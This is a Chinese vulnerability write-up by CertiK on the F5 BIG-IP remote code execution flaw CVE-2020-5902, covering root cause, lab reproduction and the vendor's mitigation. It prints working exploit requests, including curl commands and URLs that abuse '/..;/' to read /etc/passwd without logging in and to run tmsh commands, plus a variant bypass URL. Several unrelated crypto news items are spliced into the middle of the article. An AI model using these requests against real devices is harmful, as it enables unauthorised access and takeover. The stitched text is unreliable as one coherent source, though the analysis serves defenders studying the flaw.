FIL:首发 | CertiK：深度解析F5 BIG-IP远程代码执行漏洞_file币现在什么价

今日一早，推特以及各大技术论坛上炸开了锅，安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容，大部分是在分享如何寻找目标，利用漏洞，并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序，搭建环境复现漏洞后，对漏洞的起因进行了分析，并在下文分享给大家。

F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface（TMUI）中存在远程代码执行漏洞，CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分，攻击者可利用该漏洞创建或删除文件，关闭服务、执行任意的系统命令，最终获得服务器的完全控制权。CVE具体表述请查看文章底部参考链接1。

受影响的BIG-IP软件版本

[15.0.0-15.1.0.3][14.1.0-14.1.2.5][13.1.0-13.1.3.3][12.1.0-12.1.5.1][11.6.1-11.6.5.1]

漏洞利用

首发 | imKey正式支持Filecoin，成为首批Filecoin硬件钱包:12月1日，随着imToken2.7.2版本上线，imKey同步支持Filecoin，成为业内首批正式支持FIL的硬件钱包。Filecoin作为imKey多链支持的优先级项目之一，成为继BTC、ETH、EOS和COSMOS四条公链后的第五条公链。

据悉，imKey团队已在Q4全面启动多链支持计划，计划实现imToken已经支持的所有公链项目，本次imKey升级更新，无需更换硬件，不涉及固件升级，通过应用（Applet）自动升级，即可实现imKey对Filecoin的支持及FIL的代币管理。[2020/12/2 22:52:32]

读取任意文件:

curl-k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

远程执行tmsh命令:

curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

官方给出的临时修复方案(后文会对修复进行分析)：

首发 | 火币集团全球业务副总裁：监管将决定区块链技术和加密货币的落地速度:1月21日，火币集团全球业务副总裁Ciara Sun在达沃斯世界经济论坛上表示，对区块链和数字货币的监管态度，2019年是重要的一年。在美国，到2019年底，针对加密货币和区块链政策有21项法案，这些法案包括税收问题，监管结构，跟踪功能和ETF批准，哪些联邦机构监管数字资产等。欧盟（EU）在2020年1月10日实施了一项新法律，要求加密货币平台采取更严格的反做法。瑞士，日本，立陶宛，马耳他和墨西哥通过法律，要求交易所必须根据KYC和AML准则获得许可。中国，土耳其，泰国等国家正在计划自己的中央银行数字货币（CBDC）。而监管将决定区块链技术和加密货币的落地速度。[2020/1/22]

 

漏洞复现

在F5的官网注册账号之后，可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS(Traffic Management Operating System, 流量管理操作系统)的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion, 下载的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”。

首发 | 刘尧：百度区块链推出天链平台赋能链上业务:12月20日，由CSDN主办的“2019中国区块链开发者大会”12月20日在北京举行。百度智能云区块链产品负责人刘尧以《企业区块链赋能产业创新落地》为主题进行了演讲，他指出：2020年将是区块链企业落地的元年，为了支持中国区块链的产业落地，百度将区块链进行平台化战略升级，依托百度智能云推出天链平台，就是要赋能360行的链上业务创新落地。[2019/12/20]

在Vmware Fusion中加载镜像(import)：

加载完成之后，使用默认用户名密码登陆系统：

用户名: root

密码: default

系统初始化之后，使用”ifconfig”命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMUI虚拟机IP地址为”172.16.4.137”。

在浏览器中访问BIG-IP TMUI登陆界面:

https://172.16.4.137/tmui/login.jsp

首发 | 蚂蚁矿机S17性能曝光 采用全新散热技术及全局优化定制方案:金色财经讯，日前，比特大陆即将发布的蚂蚁矿机S17性能曝光。据蚂蚁矿机S17产品经理朋友圈称，新品将采用新一代散热技术及全局优化定制方案。据了解，该散热技术可能是指芯片的封装技术，也有可能是机器的散热结构设计。至于S17产品“全局优化定制”方案未有细节透露。有声音评价，这或许是为决战丰水期做出的准备。[2019/3/22]

复现任意文件读取:

在浏览器中访问以下地址可以读取”/etc/passwd”文件内容：

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

复现tmsh命令执行:

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

IMEOS首发 BM表示EOS合约具有整数溢出保护:据金色财经合作媒体IMEOS报道：近日ETH出现多个ERC20智能合约的处理溢出错误，BM在推特上发表评论：新的ETH契约Bug可能会破坏整个Token的供应，让持有者留下无价值Token.这就算为什么代码不能成为法律，随即表示EOS erc合约不容易受到这种攻击。而EOS官方群也有人表示担忧EOS是否具有整数溢出保护？BM回应：有很多C ++模板类可以封装类型并检查溢出。[2018/4/25]

漏洞分析

在进入漏洞分析前，先要明确一点：漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用户登陆后本身是可以被访问的。

下面的截图显示了登陆前和登陆后访问以下URL的区别：

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

登陆前访问：

被跳转回登陆界面

输入账号密码登陆管理界面之后再访问，可执行fileRead.jsp读取文件。

fileRead.jsp和tmshCmd.jsp虽然是在PoC中最终被利用的文件，但是他们并不是漏洞的起因。此漏洞的本质是利用Apache和后台Java(tomcat)对URL的解析方式不同来绕过登陆限制, 在未授权的情况下，访问后台JSP模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的BlackHat演讲: “Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. 这里可以查看演讲稿件(参考链接2)。

这里我们可以理解在F5 BIG-IP的后台服务器对收到了URL请求进行了两次的解析，第一次是httpd(Apache), 第二次是后一层的Java(tomcat).

在URL在第一次被Apache解析时，Apache关注的是URL的前半段

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

当Apache在看见前半段是合法URL且是允许被访问的页面时，就把它交给了后面的第二层。Apache在这里完全把URL里面关键的 /..;/ 给无视了。

在URL在第二次被解析时，后面的Java(tomcat)会把/..;/理解为，向上返回一层路径。此时,   /login.jsp/  和  /..;/ 会抵消掉。Tomcat看到的真正请求从

变成了:

再来fileRead.jsp并没有对收到的请求进行身份验证，后台因此直接执行fileRead.jsp, 读取并返回了/etc/passwd文件的内容。

根据以上的思路，其实可以找出别的利用漏洞的URL, 比如:

https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

这里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一样，是一个不需要登陆就能访问的页面。但是因为要向上返回两次，需要用两个/..;/来抵消掉 ”/login/legal.html”。

回到开头提到的官方给出的临时修复方案, 修复方案的本质是在httpd的配置中添加以下规则:

include '

<LocationMatch ".*\.\.;.*">

Redirect 404 /

</LocationMatch>

这个规则的意思是，当http服务器在监测到URL中包含..;(句号句号分号)的时候，直接返回404. 这样利用漏洞的请求就没办法到达后台(第二层)了。

如何避免漏洞:

此漏洞的利用方式在网络上公开之后，因为它的攻击成本低廉，大批黑客都开始图谋利用此漏洞攻击使用F5 BIG-IP产品的系统。黑客只需要付出极小的代价就能获得目标系统的控制权，对系统产生巨大的破坏。

俗话说：“不怕贼偷，就怕贼惦记”。即便这样的黑客攻击事件这次没有发生在你身上，不代表你是安全的。因为很有可能黑客的下一个目标就是你。

而Certik的专业技术团队会帮你彻底打消这种“贼惦记”的担忧。CertiK专业渗透测试团队会通过对此类事件的监测，第一时间给客户提交漏洞预警报告，帮助客户了解漏洞细节以及防护措施。此举可以确保客户的系统不受攻击并且不会遭受财产损失。

同时作为一名安全技术人员，在新漏洞被发现的时，不仅需要知道漏洞是如何被黑客利用的，更要去探寻漏洞背后的原因，方可积累经验，更加有能力在复杂的系统中发现隐藏的漏洞。

CertiK以及其技术人员，将永远把安全当做信仰，与大家一同学习并一同成长。

参考链接

1.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902

2.https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.0.0&container=Virtual-Edition

3.https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

标签：FILFILEHTTPACNDFIL币file币现在什么价https://etherscan.ioSpace Crypto

ICP热门资讯